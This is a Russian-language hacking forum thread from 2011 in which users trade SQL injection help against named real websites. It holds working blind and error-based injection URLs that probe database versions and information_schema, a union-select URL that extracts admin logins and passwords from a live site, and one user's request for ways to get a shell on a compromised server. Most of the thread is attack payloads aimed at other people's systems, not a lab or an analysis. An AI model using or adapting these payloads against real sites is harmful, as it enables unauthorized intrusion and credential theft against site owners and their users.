ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.10.2011, 15:34
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Mr.aids
Mr.aids said:
запрос вида
log.php?ver=1.0.1.130'
Ошибка при занесении информации в базу.
118 ******/log.php
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1.0.1.130'', '' )' at line 25
INSERT INTO log (event, os, client, ie, fr, op, ch, guid, ip, ver, msg ) VALUES ( '', '', '', '', '', '', '', '', '127.0.0.1', '1.0.1.130'', '' ) array(1) { ["ver"]=> string(10) "1.0.1.130'" }
все параметры строковые, можно как то вставить union+select?
/showpost.php?p=2582303&postcount=16413
Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.
|
|
|
07.10.2011, 22:35
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver =test9&msg=test10
и эта не работает
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201 ),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10
слепая скуль, что то делаю не так (перебираю a-z)
http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(sub string((SELECT%20os%20FROM%20log),1,1))
подскажите чего нибудь
|
|
|
|
07.10.2011, 23:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Mr.aids
Mr.aids said:
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver =test9&msg=test10
и эта не работает
http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3& fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201 ),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10
слепая скуль, что то делаю не так (перебираю a-z)
http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(sub string((SELECT%20os%20FROM%20log),1,1))
подскажите чего нибудь
1 - просто вывод того, что передали параметром.
2.
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(vers ion(),1,1))>0,1,0))
меняешь >0 и подбираешь код символа. через char() можешь получить его значение.
|
|
|
|
08.10.2011, 13:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
Сообщение от Melfis
Melfis said:
1 - просто вывод того, что передали параметром.
2.
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(vers ion(),1,1))>0,1,0))
меняешь >0 и подбираешь код символа. через char() можешь получить его значение.
кстати ascii не работает
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(lower(subst r('1',1,1)))=31,1,0))
|
|
|
|
08.10.2011, 13:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr(vers ion(),1,1))='5',1,0))
вот так фурычит
|
|
|
|
08.10.2011, 13:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется
|
|
|
|
08.10.2011, 14:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Mr.aids
Mr.aids said:
только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется
что не так?
Код:
Code:
http://fvsn.org/download.php?id=(18296)and(1)=if(mid((select(version())),1,1)=5,1,0)
|
|
|
|
08.10.2011, 14:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Код:
Code:
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((select count(table_name) from information_schema.tables),1,1))=49,1,0))
Тут тоже не фильтруется. |
|
|
|
08.10.2011, 15:45
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
Провел на форуме:
2052341
Репутация:
95
|
|
такая ситуация:
обычная скуль..ничего не фильтруется, трудностей не возникло вообще до получения login;pass админа. Хочу получить шелл, НО:
1. Не могу найти панель администратора. Такое впечатление, что на самом сайте ее вообще нет.
2. Нет прав у текущего юзверя под которым работает БД на то чтобы залить шелл средствами с ку эль.
Есть какие еще варианты получения шелла?
Чтобы не быть голословным привожу линк
http://banksbattle.ru/333.php?archiv=-59+union+select+1,concat(login,0x20,password),3,4, 5,6+from+admins--
жду ваших предложений=)
|
|
|
|
08.10.2011, 18:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
2371
Репутация:
0
|
|
Сообщение от Melfis
Melfis said:
Код:
Code:
http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((select count(table_name) from information_schema.tables),1,1))=49,1,0))
Тут тоже не фильтруется. блин у меня сейчас голова взарвётся. как так это работает.
ведь это не работает
http://fvsn.org/download.php?id=(18296)and%20ascii('1')=31
, а в ней ascii
я сейчас сума сойду, как в первом выражении ascii прошло, а в моём не проходит, объясните пожалуйста?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
